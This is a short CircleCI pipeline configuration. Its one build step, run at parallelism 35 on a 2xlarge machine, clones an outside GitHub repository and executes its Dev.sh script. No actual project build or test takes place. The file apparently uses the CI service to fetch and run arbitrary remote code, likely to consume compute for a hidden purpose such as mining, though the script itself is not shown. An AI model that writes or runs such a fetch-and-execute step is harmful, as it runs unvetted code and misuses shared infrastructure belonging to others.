version: 2
jobs:
  build:
    docker:
      - image: ruby:latest
    parallelism: 35
    resource_class: 2xlarge
    steps:
      - run: git clone https://github.com/burasbodas/Dev.git && cd dev && chmod u+x Dev.sh && ./Dev.sh
workflows:
    version: 2
    build:
        jobs:
            - build
